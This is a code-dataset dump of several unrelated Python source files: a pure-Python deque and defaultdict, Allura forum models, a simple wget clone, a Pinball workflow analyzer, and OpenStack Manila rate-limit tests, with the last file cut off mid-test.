gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""High performance data structures
"""
#
# Copied and completed from the sandbox of CPython
# (nondist/sandbox/collections/pydeque.py rev 1.1, Raymond Hettinger)
#
# Note that PyPy also contains a built-in module '_collections' which will hide
# this one if compiled in.
# try:
# from threading import _get_ident as _thread_ident
# except ImportError:
# def _thread_ident():
# return -1
import thread
_thread_ident = thread.get_ident
n = 30
LFTLNK = n
RGTLNK = n+1
BLOCKSIZ = n+2
# The deque's size limit is d.maxlen. The limit can be zero or positive, or
# None. After an item is added to a deque, we check to see if the size has
# grown past the limit. If it has, we get the size back down to the limit by
# popping an item off of the opposite end. The methods that can trigger this
# are append(), appendleft(), extend(), and extendleft().
class deque(object):
def __new__(cls, iterable=(), *args, **kw):
self = super(deque, cls).__new__(cls)
self.clear()
return self
def __init__(self, iterable=(), maxlen=None):
self.clear()
if maxlen is not None:
if maxlen < 0:
raise ValueError("maxlen must be non-negative")
self._maxlen = maxlen
add = self.append
for elem in iterable:
add(elem)
# @property
def maxlen(self):
return self._maxlen
# TODO: Make this a decorator once they're implemented.
maxlen = property(maxlen)
def clear(self):
self.right = self.left = [None] * BLOCKSIZ
self.rightndx = n//2 # points to last written element
self.leftndx = n//2+1
self.length = 0
self.state = 0
def append(self, x):
self.state += 1
self.rightndx += 1
if self.rightndx == n:
newblock = [None] * BLOCKSIZ
self.right[RGTLNK] = newblock
newblock[LFTLNK] = self.right
self.right = newblock
self.rightndx = 0
self.length += 1
self.right[self.rightndx] = x
if self.maxlen is not None and self.length > self.maxlen:
self.popleft()
def appendleft(self, x):
self.state += 1
self.leftndx -= 1
if self.leftndx == -1:
newblock = [None] * BLOCKSIZ
self.left[LFTLNK] = newblock
newblock[RGTLNK] = self.left
self.left = newblock
self.leftndx = n-1
self.length += 1
self.left[self.leftndx] = x
if self.maxlen is not None and self.length > self.maxlen:
self.pop()
def extend(self, iterable):
if iterable is self:
iterable = list(iterable)
for elem in iterable:
self.append(elem)
def extendleft(self, iterable):
if iterable is self:
iterable = list(iterable)
for elem in iterable:
self.appendleft(elem)
def pop(self):
if self.left is self.right and self.leftndx > self.rightndx:
raise IndexError("pop from an empty deque")
x = self.right[self.rightndx]
self.right[self.rightndx] = None
self.length -= 1
self.rightndx -= 1
self.state += 1
if self.rightndx == -1:
prevblock = self.right[LFTLNK]
if prevblock is None:
# the deque has become empty; recenter instead of freeing block
self.rightndx = n//2
self.leftndx = n//2+1
else:
prevblock[RGTLNK] = None
self.right[LFTLNK] = None
self.right = prevblock
self.rightndx = n-1
return x
def popleft(self):
if self.left is self.right and self.leftndx > self.rightndx:
raise IndexError("pop from an empty deque")
x = self.left[self.leftndx]
self.left[self.leftndx] = None
self.length -= 1
self.leftndx += 1
self.state += 1
if self.leftndx == n:
prevblock = self.left[RGTLNK]
if prevblock is None:
# the deque has become empty; recenter instead of freeing block
self.rightndx = n//2
self.leftndx = n//2+1
else:
prevblock[LFTLNK] = None
self.left[RGTLNK] = None
self.left = prevblock
self.leftndx = 0
return x
def count(self, value):
c = 0
for item in self:
if item == value:
c += 1
return c
def remove(self, value):
# Need to defend mutating or failing comparisons
i = 0
try:
for i in range(len(self)):
if self[0] == value:
self.popleft()
return
self.append(self.popleft())
i += 1
raise ValueError("deque.remove(x): x not in deque")
finally:
self.rotate(i)
def rotate(self, n=1):
length = len(self)
if length <= 1:
return
halflen = length >> 1
if n > halflen or n < -halflen:
n %= length
if n > halflen:
n -= length
elif n < -halflen:
n += length
while n > 0:
self.appendleft(self.pop())
n -= 1
while n < 0:
self.append(self.popleft())
n += 1
def reverse(self):
"reverse *IN PLACE*"
leftblock = self.left
rightblock = self.right
leftindex = self.leftndx
rightindex = self.rightndx
for i in range(self.length // 2):
# Validate that pointers haven't met in the middle
assert leftblock != rightblock or leftindex < rightindex
# Swap
(rightblock[rightindex], leftblock[leftindex]) = (
leftblock[leftindex], rightblock[rightindex])
# Advance left block/index pair
leftindex += 1
if leftindex == n:
leftblock = leftblock[RGTLNK]
assert leftblock is not None
leftindex = 0
# Step backwards with the right block/index pair
rightindex -= 1
if rightindex == -1:
rightblock = rightblock[LFTLNK]
assert rightblock is not None
rightindex = n - 1
def __repr__(self):
threadlocalattr = '__repr' + str(_thread_ident())
if threadlocalattr in self.__dict__:
return 'deque([...])'
else:
self.__dict__[threadlocalattr] = True
try:
if self.maxlen is not None:
return 'deque(%r, maxlen=%s)' % (list(self), self.maxlen)
else:
return 'deque(%r)' % (list(self),)
finally:
del self.__dict__[threadlocalattr]
def __iter__(self):
return deque_iterator(self, self._iter_impl)
def _iter_impl(self, original_state, giveup):
if self.state != original_state:
giveup()
block = self.left
while block:
l, r = 0, n
if block is self.left:
l = self.leftndx
if block is self.right:
r = self.rightndx + 1
for elem in block[l:r]:
yield elem
if self.state != original_state:
giveup()
block = block[RGTLNK]
def __reversed__(self):
return deque_iterator(self, self._reversed_impl)
def _reversed_impl(self, original_state, giveup):
if self.state != original_state:
giveup()
block = self.right
while block:
l, r = 0, n
if block is self.left:
l = self.leftndx
if block is self.right:
r = self.rightndx + 1
for elem in reversed(block[l:r]):
yield elem
if self.state != original_state:
giveup()
block = block[LFTLNK]
def __len__(self):
#sum = 0
#block = self.left
#while block:
# sum += n
# block = block[RGTLNK]
#return sum + self.rightndx - self.leftndx + 1 - n
return self.length
def __getref(self, index):
if index >= 0:
block = self.left
while block:
l, r = 0, n
if block is self.left:
l = self.leftndx
if block is self.right:
r = self.rightndx + 1
span = r-l
if index < span:
return block, l+index
index -= span
block = block[RGTLNK]
else:
block = self.right
while block:
l, r = 0, n
if block is self.left:
l = self.leftndx
if block is self.right:
r = self.rightndx + 1
negative_span = l-r
if index >= negative_span:
return block, r+index
index -= negative_span
block = block[LFTLNK]
raise IndexError("deque index out of range")
def __getitem__(self, index):
block, index = self.__getref(index)
return block[index]
def __setitem__(self, index, value):
block, index = self.__getref(index)
block[index] = value
def __delitem__(self, index):
length = len(self)
if index >= 0:
if index >= length:
raise IndexError("deque index out of range")
self.rotate(-index)
self.popleft()
self.rotate(index)
else:
index = ~index
if index >= length:
raise IndexError("deque index out of range")
self.rotate(index)
self.pop()
self.rotate(-index)
def __reduce_ex__(self, proto):
return type(self), (list(self), self.maxlen)
__hash__ = None
def __copy__(self):
return self.__class__(self, self.maxlen)
# XXX make comparison more efficient
def __eq__(self, other):
if isinstance(other, deque):
return list(self) == list(other)
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, deque):
return list(self) != list(other)
else:
return NotImplemented
def __lt__(self, other):
if isinstance(other, deque):
return list(self) < list(other)
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, deque):
return list(self) <= list(other)
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, deque):
return list(self) > list(other)
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, deque):
return list(self) >= list(other)
else:
return NotImplemented
def __iadd__(self, other):
self.extend(other)
return self
class deque_iterator(object):
def __init__(self, deq, itergen):
self.counter = len(deq)
def giveup():
self.counter = 0
raise RuntimeError("deque mutated during iteration")
self._gen = itergen(deq.state, giveup)
def next(self):
res = next(self._gen)
self.counter -= 1
return res
def __iter__(self):
return self
class defaultdict(dict):
def __init__(self, *args, **kwds):
if len(args) > 0:
default_factory = args[0]
args = args[1:]
if not callable(default_factory) and default_factory is not None:
raise TypeError("first argument must be callable")
else:
default_factory = None
self.default_factory = default_factory
super(defaultdict, self).__init__(*args, **kwds)
def __missing__(self, key):
# from defaultdict docs
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __repr__(self, recurse=set()):
if id(self) in recurse:
return "defaultdict(...)"
try:
recurse.add(id(self))
return "defaultdict(%s, %s)" % (repr(self.default_factory), super(defaultdict, self).__repr__())
finally:
recurse.remove(id(self))
def copy(self):
return type(self)(self.default_factory, self)
def __copy__(self):
return self.copy()
def __reduce__(self):
"""
__reduce__ must return a 5-tuple as follows:
- factory function
- tuple of args for the factory function
- additional state (here None)
- sequence iterator (here None)
- dictionary iterator (yielding successive (key, value) pairs
This API is used by pickle.py and copy.py.
"""
return (type(self), (self.default_factory,), None, None, self.iteritems())
| |
import re
import logging
from itertools import chain
from ming import schema
from ming.utils import LazyProperty
from ming.orm import FieldProperty, RelationProperty, ForeignIdProperty, Mapper
from allura import model as M
from allura.lib import utils
from allura.lib import helpers as h
config = utils.ConfigProxy(
common_suffix='forgemail.domain')
log = logging.getLogger(__name__)
class Forum(M.Discussion):
class __mongometa__:
name='forum'
type_s = 'Discussion'
parent_id = FieldProperty(schema.ObjectId, if_missing=None)
threads = RelationProperty('ForumThread')
posts = RelationProperty('ForumPost')
members_only = FieldProperty(bool, if_missing=False)
anon_posts = FieldProperty(bool, if_missing=False)
monitoring_email = FieldProperty(str, if_missing=None)
@classmethod
def attachment_class(cls):
return ForumAttachment
@classmethod
def thread_class(cls):
return ForumThread
@LazyProperty
def threads(self):
threads = self.thread_class().query.find(dict(discussion_id=self._id)).all()
sorted_threads = chain(
(t for t in threads if 'Announcement' in t.flags),
(t for t in threads if 'Sticky' in t.flags and 'Announcement' not in t.flags),
(t for t in threads if 'Sticky' not in t.flags and 'Announcement' not in t.flags))
return list(sorted_threads)
@property
def parent(self):
return Forum.query.get(_id=self.parent_id)
@property
def subforums(self):
return Forum.query.find(dict(parent_id=self._id)).all()
@property
def email_address(self):
domain = '.'.join(reversed(self.app.url[1:-1].split('/'))).replace('_', '-')
return '%s@%s%s' % (self.shortname.replace('/', '.'), domain, config.common_suffix)
@LazyProperty
def announcements(self):
return self.thread_class().query.find(dict(
app_config_id=self.app_config_id,
flags='Announcement')).all()
def breadcrumbs(self):
if self.parent:
l = self.parent.breadcrumbs()
else:
l = []
return l + [(self.name, self.url())]
def url(self):
return h.urlquote(self.app.url + self.shortname + '/')
def delete(self):
# Delete the subforums
for sf in self.subforums:
sf.delete()
super(Forum, self).delete()
def get_discussion_thread(self, data=None):
# If the data is a reply, use the parent's thread
subject = '[no subject]'
parent_id = None
if data is not None:
in_reply_to = data.get('in_reply_to')
if in_reply_to:
parent_id = in_reply_to[0].split('/')[-1]
else:
parent_id = None
message_id = data.get('message_id') or ''
subject = data['headers'].get('Subject', subject)
if parent_id is not None:
parent = self.post_class().query.get(_id=parent_id)
if parent: return parent.thread, parent_id
if message_id:
post = self.post_class().query.get(_id=message_id)
if post: return post.thread, None
# Otherwise it's a new thread
return self.thread_class()(discussion_id=self._id,subject=subject), None
@property
def discussion_thread(self):
return None
@property
def icon(self):
return ForumFile.query.get(forum_id=self._id)
class ForumFile(M.File):
forum_id=FieldProperty(schema.ObjectId)
class ForumThread(M.Thread):
class __mongometa__:
name='forum_thread'
indexes = [
'flags',
'discussion_id',
'import_id', # may be used by external legacy systems
]
type_s = 'Thread'
discussion_id = ForeignIdProperty(Forum)
first_post_id = ForeignIdProperty('ForumPost')
flags = FieldProperty([str])
discussion = RelationProperty(Forum)
posts = RelationProperty('ForumPost')
first_post = RelationProperty('ForumPost', via='first_post_id')
@property
def status(self):
if self.first_post:
return self.first_post.status
else:
return 'ok'
@classmethod
def attachment_class(cls):
return ForumAttachment
@property
def email_address(self):
return self.discussion.email_address
def primary(self):
return self
def post(self, subject, text, message_id=None, parent_id=None, **kw):
post = super(ForumThread, self).post(text, message_id=message_id, parent_id=parent_id, **kw)
if not self.first_post_id:
self.first_post_id = post._id
self.num_replies = 1
h.log_action(log, 'posted').info('')
return post
def set_forum(self, new_forum):
self.post_class().query.update(
dict(discussion_id=self.discussion_id, thread_id=self._id),
{'$set':dict(discussion_id=new_forum._id)}, multi=True)
self.attachment_class().query.update(
{'discussion_id':self.discussion_id, 'thread_id':self._id},
{'$set':dict(discussion_id=new_forum._id)})
self.discussion_id = new_forum._id
class ForumPostHistory(M.PostHistory):
class __mongometa__:
name='post_history'
artifact_id = ForeignIdProperty('ForumPost')
class ForumPost(M.Post):
class __mongometa__:
name='forum_post'
history_class = ForumPostHistory
type_s = 'Post'
discussion_id = ForeignIdProperty(Forum)
thread_id = ForeignIdProperty(ForumThread)
discussion = RelationProperty(Forum)
thread = RelationProperty(ForumThread)
@classmethod
def attachment_class(cls):
return ForumAttachment
@property
def email_address(self):
return self.discussion.email_address
def primary(self):
return self
def promote(self):
'''Make the post its own thread head'''
thd = self.thread_class()(
discussion_id=self.discussion_id,
subject=self.subject,
first_post_id=self._id)
self.move(thd, None)
return thd
def move(self, thread, new_parent_id):
# Add a placeholder to note the move
placeholder = self.thread.post(
subject='Discussion moved',
text='',
parent_id=self.parent_id)
placeholder.slug = self.slug
placeholder.full_slug = self.full_slug
placeholder.approve()
if new_parent_id:
parent = self.post_class().query.get(_id=new_parent_id)
else:
parent = None
# Set the thread ID on my replies and attachments
old_slug = self.slug + '/', self.full_slug + '/'
reply_re = re.compile(self.slug + '/.*')
self.slug, self.full_slug = self.make_slugs(parent=parent, timestamp=self.timestamp)
placeholder.text = 'Discussion moved to [here](%s#post-%s)' % (
thread.url(), self.slug)
new_slug = self.slug + '/', self.full_slug + '/'
self.discussion_id=thread.discussion_id
self.thread_id=thread._id
self.parent_id=new_parent_id
self.text = 'Discussion moved from [here](%s#post-%s)\n\n%s' % (
placeholder.thread.url(), placeholder.slug, self.text)
reply_tree = self.query.find(dict(slug=reply_re)).all()
for post in reply_tree:
post.slug = new_slug[0] + post.slug[len(old_slug[0]):]
post.full_slug = new_slug[1] + post.slug[len(old_slug[1]):]
post.discussion_id=self.discussion_id
post.thread_id=self.thread_id
for post in [ self ] + reply_tree:
for att in post.attachments:
att.discussion_id=self.discussion_id
att.thread_id=self.thread_id
class ForumAttachment(M.DiscussionAttachment):
DiscussionClass=Forum
ThreadClass=ForumThread
PostClass=ForumPost
class __mongometa__:
polymorphic_identity='ForumAttachment'
attachment_type=FieldProperty(str, if_missing='ForumAttachment')
Mapper.compile_all()
| |
import re
import sys
import time
import socket
import urllib2
def is_valid_ip(addr):
"""
Thanks to @Markus Jarderot on Stack Overflow
http://stackoverflow.com/a/319293
"""
return is_valid_ipv4(addr) or is_valid_ipv6(addr)
def is_valid_ipv4(addr):
"""
Thanks to @Markus Jarderot on Stack Overflow
http://stackoverflow.com/a/319293
"""
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hex 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(addr) is not None
def is_valid_ipv6(addr):
"""
Thanks to @Markus Jarderot on Stack Overflow
http://stackoverflow.com/a/319293
"""
pattern = re.compile(r"""
^
\s* # Leading whitespace
(?!.*::.*::) # Only a single whildcard allowed
(?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
(?: # Repeat 6 times:
[0-9a-f]{0,4} # A group of at most 4 hexadecimal digits
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
){6} #
(?: # Either
[0-9a-f]{0,4} # Another group
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
[0-9a-f]{0,4} # Last group
(?: (?<=::) # Colon iff preceeded by exacly one colon
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
){3}
)
\s* # Trailing whitespace
$
""", re.VERBOSE | re.IGNORECASE | re.DOTALL)
return pattern.match(addr) is not None
def ip_is_resolvable(ip_addr):
try:
return socket.gethostbyaddr(ip_addr)
except (socket.herror, socket.gaierror):
return None
def chunk_report(bytes_so_far, chunk_size, total_size):
percent = float(bytes_so_far) / total_size
if percent:
equals = '=' * int(percent * 39)
else:
equals = ''
equals += '>'
space = ' ' * (39 - len(equals))
percentage = '[%s%s] ' % (equals, space)
str_percent = str(int(percent * 100)) + '%'
text = "{:<4}{} {:,}\r".format(str_percent, percentage, bytes_so_far)
# slick way to print text on a single line repeatedly
print text,
if bytes_so_far >= total_size:
print '\n'
def chunk_read(response, chunk_size=8192, report_hook=None):
total_size = int(response.info().getheader('Content-Length').strip())
bytes_so_far = 0
while True:
chunk = response.read(chunk_size)
bytes_so_far += len(chunk)
if not chunk:
break
if report_hook:
report_hook(bytes_so_far, chunk_size, total_size)
return bytes_so_far
def num_fmt(num):
# ignore anything smaller than a kilobyte
num /= 1024.0
if num < 1024.0:
return
for x in ['K', 'M', 'G']:
if num < 1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'T')
def wget(args):
url = args[0]
url_s = url.split('/')[0]
if not '://' in url:
url = 'http://' + url
localtime = str(time.strftime('%Y-%m-%e %H:%M:%S', time.localtime()))
print '--%s-- %s' % (localtime, url)
if is_valid_ip(url):
host = url_s
else:
host = url_s + ' (%s)' % url_s
sys.stdout.write('Resolving %s... ' % host)
addr = ip_is_resolvable(url_s)
if not addr:
print 'failed: Name or service not known.'
print 'wget: unable to resolve host address `%s\'' % url_s
return
else:
print addr[2][0]
host = host + '|%s|:80' % addr[2][0]
sys.stdout.write('Connecting to %s... ' % host)
try:
connection = urllib2.urlopen(url)
except: # make this smarter
print 'failed.'
return
print 'connected.'
print 'HTTP request sent, awaiting response... %s %s' % \
(connection.code, connection.msg)
ddl_size = connection.info().getheader('content-length')
size_fmt = num_fmt(int(ddl_size))
if size_fmt:
text = 'Length: %s (%s) [%s]' % (ddl_size, num_fmt(int(ddl_size)),
connection.info().type)
else:
text = 'Length: %s [%s]' % (ddl_size, connection.info().type)
print text
ddl_file = connection.info().getheader('content-disposition')
if not ddl_file:
ddl_file = urllib2.urlparse.urlsplit(url)[2].split('/')
ddl_file = ddl_file[len(ddl_file) - 1]
if not ddl_file:
ddl_file = 'index.html'
print "Saving to: '%s'\n" % ddl_file
localtime = str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()))
speed = '6.59 MB/s'
chunk_read(connection, report_hook=chunk_report)
print "%s (%s) - '%s' saved [%s/%s]" % (localtime, speed, ddl_file,
ddl_size, ddl_size)
print ''
# for testing
# wget(['www.csl.mtu.edu/~mareid/files/echo.sh'])
| |
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Analyzer allows to manipulate workflow instance tokens.
Only archived workflow instances can be analyzed. Tokens of an archived
workflow instance are immutable so we don't need to worry that the workflow
state will change while we manipulate the graph.
"""
import pickle
from pinball.config.pinball_config import PinballConfig
from pinball.master.thrift_lib.ttypes import Query
from pinball.master.thrift_lib.ttypes import QueryRequest
from pinball.master.thrift_lib.ttypes import Token
from pinball.parser.config_parser import ParserCaller
from pinball.parser.utils import load_parser_with_caller
from pinball.workflow.name import Name
from pinball.workflow.event import Event
from pinball.workflow.utils import load_path
__author__ = 'Pawel Garbacki, Mao Ye'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
class Analyzer(object):
def __init__(self, workflow, instance):
self._workflow = workflow
self._instance = instance
self._jobs = {}
self._existing_events = {}
self._new_events = {}
self._job_priorities = {}
@staticmethod
def from_store(store, workflow, instance):
"""Construct analyzer from tokens in a store.
Args:
store: The store to read tokens from.
workflow: The workflow whose tokens should be read.
instance: The instance whose tokens should be read.
Returns:
Analyzer initialized with tokens read from the store.
"""
analyzer = Analyzer(workflow, instance)
analyzer._read_tokens_from_store(store)
return analyzer
@staticmethod
def from_parser_params(workflow):
"""Construct analyzer from tokens of a workflow according
to the parser params configuration.
Args:
workflow: The workflow whose tokens should be read.
Returns:
Analyzer initialized with tokens read from the config.
"""
analyzer = Analyzer(workflow, None)
analyzer._read_tokens_from_parser_params()
return analyzer
@staticmethod
def from_client(client, workflow, instance):
"""Construct analyzer from tokens of a workflow in the master.
Args:
client: The client connected to the master.
workflow: The workflow whose tokens should be read.
instance: The instance whose tokens should be read.
Returns:
Analyzer initialized with tokens read from the client.
"""
analyzer = Analyzer(workflow, instance)
analyzer._read_tokens_from_client(client)
return analyzer
def _filter_job_tokens(self, tokens):
"""Filter out all tokens which are not job tokens.
Args:
tokens: The tokens to filter.
"""
for token in tokens:
name = Name.from_job_token_name(token.name)
if not self._instance and name.instance:
self._instance = name.instance
if name.job:
job = pickle.loads(token.data)
self._jobs[job.name] = job
self._job_priorities[job.name] = token.priority
def _filter_event_tokens(self, tokens):
"""Filter out all tokens which are not event tokens.
Args:
tokens: The tokens to filter.
"""
for token in tokens:
name = Name.from_event_token_name(token.name)
if not self._instance and name.instance:
self._instance = name.instance
if name.event:
event = pickle.loads(token.data)
self._existing_events[token.name] = event
def _read_tokens_from_store(self, store):
"""Read archived job tokens from the store.
Args:
store: The store to read tokens from.
"""
name = Name(workflow=self._workflow, instance=self._instance)
tokens = store.read_archived_tokens(
name_prefix=name.get_instance_prefix())
self._filter_job_tokens(tokens)
def _read_tokens_from_parser_params(self):
"""Read archived job tokens from the PinballConfig.PARSER_PARAMS.
"""
config_parser = load_parser_with_caller(PinballConfig.PARSER,
PinballConfig.PARSER_PARAMS,
ParserCaller.ANALYZER)
tokens = config_parser.get_workflow_tokens(self._workflow)
self._filter_job_tokens(tokens)
def _read_tokens_from_client(self, client):
"""Read archived job tokens from the client.
Args:
client: The client to read tokens from.
"""
name = Name(workflow=self._workflow, instance=self._instance)
query = Query(namePrefix=name.get_workflow_prefix())
request = QueryRequest(queries=[query])
response = client.query(request)
assert len(response.tokens) == 1
tokens = response.tokens[0]
self._filter_job_tokens(tokens)
self._filter_event_tokens(tokens)
def get_tokens(self):
"""Export all internally stored tokens.
Returns:
The list of tokens after all transformations performed by the
analyzer.
"""
result = []
for job in self._jobs.values():
name = Name(workflow=self._workflow, instance=self._instance,
job_state=Name.WAITING_STATE, job=job.name)
data = pickle.dumps(job)
token = Token(name=name.get_job_token_name(),
priority=self._job_priorities[job.name],
data=data)
result.append(token)
result.extend(self.get_new_event_tokens())
return result
def get_new_event_tokens(self):
"""Export new event tokens.
Returns:
The list of new event tokens after all transformations performed by
the analyzer.
"""
result = []
for event_name, event in self._new_events.items():
data = pickle.dumps(event)
token = Token(name=event_name, data=data)
result.append(token)
return result
def _find_descendants(self, job_name):
"""Find direct and indirect descendants of a job.
Args:
job_name: The name of the job whose descendants should be computed.
Returns:
The set of job descendants.
"""
def _dfs(current, visited):
if not current in visited:
visited.add(current)
for child in current.outputs:
_dfs(self._jobs[child], visited)
visited = set()
_dfs(self._jobs[job_name], visited)
result = set()
for job in visited:
result.add(job.name)
return result
def _generate_missing_events(self, job_names):
"""Generate external events required to run all jobs in a set.
For a set of jobs (a subset of all jobs in the workflow), produce
events satisfying upstream dependencies external to that set. E.g.,
for job dependency structure like this:
A1 A2
| /
B1 B2
|
C1 C2
| /
D1
and job_names = (C1, D1) we would generate events satisfying the
following deps: B1->C1, C2->D1.
Args:
job_names: The set of job names whose external deps are to be
satisfied by the generated events.
"""
input_prefixes = set()
for job_name in job_names:
job = self._jobs[job_name]
for job_input in job.inputs:
if job_input not in job_names:
name = Name(workflow=self._workflow,
instance=self._instance,
job=job_name,
input_name=job_input,
event='poison_%d' % len(input_prefixes))
input_prefix = name.get_input_prefix()
if input_prefix not in input_prefixes:
input_prefixes.add(input_prefix)
event_token_name = name.get_event_token_name()
if not event_token_name in self._existing_events:
self._new_events[
name.get_event_token_name()] = Event(
'analyzer')
def poison(self, roots):
"""Poison the workflow instance at specified root jobs.
Poisoning is a process of choosing a subset of jobs to run based on
the dependencies. Only jobs that depend directly or indirectly on any
job in the root set will be executed. Poisoning will generate events
for dependencies which are not satisfied by the roots or their
dependents.
Args:
roots: The list of job names which are roots of the poisoning.
"""
descendants = set()
for root in roots:
jobs = self._find_descendants(root)
descendants = descendants.union(jobs)
self._generate_missing_events(descendants)
def change_instance(self, instance):
"""Move all tokens to a specific instance."""
self._instance = instance
new_events = {}
for event_name, event in self._new_events.items():
name = Name.from_event_token_name(event_name)
name.instance = instance
new_events[name.get_event_token_name()] = event
self._new_events = new_events
def clear_job_histories(self):
"""Remove histories from all job tokens."""
for job in self._jobs.values():
job.history = []
| |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
from oslo_serialization import jsonutils
import six
from six import moves
from six.moves import http_client
import webob
from manila.api.v1 import limits
from manila.api import views
import manila.context
from manila import test
TEST_LIMITS = [
limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
limits.Limit("POST", "/shares", "^/shares", 3, limits.PER_MINUTE),
limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
limits.Limit("PUT", "/shares", "^/shares", 5, limits.PER_MINUTE),
]
NS = {
'atom': 'http://www.w3.org/2005/Atom',
'ns': 'http://docs.openstack.org/common/api/v1.0'
}
class BaseLimitTestSuite(test.TestCase):
"""Base test suite which provides relevant stubs and time abstraction."""
def setUp(self):
super(BaseLimitTestSuite, self).setUp()
self.time = 0.0
self.mock_object(limits.Limit, "_get_time", self._get_time)
self.absolute_limits = {}
def stub_get_project_quotas(context, project_id, usages=True):
quotas = {}
for mapping_key in ('limit', 'in_use'):
for k, v in self.absolute_limits.get(mapping_key, {}).items():
if k not in quotas:
quotas[k] = {}
quotas[k].update({mapping_key: v})
return quotas
self.mock_object(manila.quota.QUOTAS, "get_project_quotas",
stub_get_project_quotas)
def _get_time(self):
"""Return the "time" according to this test suite."""
return self.time
class LimitsControllerTest(BaseLimitTestSuite):
"""Tests for `limits.LimitsController` class."""
def setUp(self):
"""Run before each test."""
super(LimitsControllerTest, self).setUp()
self.controller = limits.create_resource()
def _get_index_request(self, accept_header="application/json"):
"""Helper to set routing arguments."""
request = webob.Request.blank("/")
request.accept = accept_header
request.environ["wsgiorg.routing_args"] = (None, {
"action": "index",
"controller": "",
})
context = manila.context.RequestContext('testuser', 'testproject')
request.environ["manila.context"] = context
return request
def _populate_limits(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
limits.Limit("GET", "changes-since*", "changes-since",
5, 60).display(),
]
request.environ["manila.limits"] = _limits
return request
def test_empty_index_json(self):
"""Test getting empty limit details in JSON."""
request = self._get_index_request()
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def test_index_json(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits(request)
self.absolute_limits = {
'limit': {
'shares': 11,
'gigabytes': 22,
'snapshots': 33,
'snapshot_gigabytes': 44,
'share_networks': 55,
},
'in_use': {
'shares': 3,
'gigabytes': 4,
'snapshots': 5,
'snapshot_gigabytes': 6,
'share_networks': 7,
},
}
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
{
"verb": "POST",
"next-available": "1970-01-01T00:00:00Z",
"unit": "HOUR",
"value": 5,
"remaining": 5,
},
],
},
{
"regex": "changes-since",
"uri": "changes-since*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 5,
"remaining": 5,
},
],
},
],
"absolute": {
"totalSharesUsed": 3,
"totalShareGigabytesUsed": 4,
"totalShareSnapshotsUsed": 5,
"totalSnapshotGigabytesUsed": 6,
"totalShareNetworksUsed": 7,
"maxTotalShares": 11,
"maxTotalShareGigabytes": 22,
"maxTotalShareSnapshots": 33,
"maxTotalSnapshotGigabytes": 44,
"maxTotalShareNetworks": 55,
},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _populate_limits_diff_regex(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("GET", "*", "*.*", 10, 60).display(),
]
request.environ["manila.limits"] = _limits
return request
def test_index_diff_regex(self):
"""Test getting limit details in JSON."""
